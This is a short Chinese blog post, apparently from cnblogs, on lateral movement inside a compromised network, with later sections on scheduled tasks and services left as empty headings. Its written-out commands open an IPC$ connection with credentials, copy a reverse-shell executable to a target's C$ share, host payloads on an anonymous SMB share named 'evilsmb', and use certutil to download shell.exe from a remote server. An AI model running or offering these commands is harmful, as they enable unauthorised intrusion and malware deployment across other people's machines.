内网渗透之横向移动

一、使用文件传输

1.1 网络共享

在网络资源共享中,有adminIPC共享,是实战中通常建立的共享连接;建立IPC$共享需要以下两个条件:

1.远程主机开启了IPC连接
2.远程主机的139端口和445端口开放

执行以下命令就可以与远程主机建立IPC连接

net use \\10.10.10.19\IPC$ "password" /user:"username"

建立连接之后就可以使用命令了,比如

dir \\10.10.10.19\C$ 列出C盘的目录

将攻击载荷上传到目标主机

copy ./reverse_tcp.exe \\10.10.10.19\C$

1.2 搭建SMB服务器

在自己的服务器或者被控的主机上搭建一个SMB服务器,将攻击载荷放到SMB服务器的共享目录中,并指定UNC路径,让横向移动的目标主机远程加载SMB共享的文件。

在Linux上使用smbserver.py来搭建:

mkdir /root/share
python smbserver.py evilsmb /root/share -smb2support

执行上述命令即可搭建一个名为evilsmb 共享目录指向share的SMb匿名共享。

1.3 通过Windows自带工具

certutil -urlcache -split -f http://ip:port/shell.exe C:\reverse.exe

二、创建计划任务

2.1 常规利用流程

2.2 UNC路径加载执行

三、利用系统服务

3.1 创建远程服务

3.2 SCShell

3.3 UAC Remote Restritions

posted @   云岛夜川川  阅读(86)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· winform 绘制太阳,地球,月球 运作规律
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
点击右上角即可分享
微信分享提示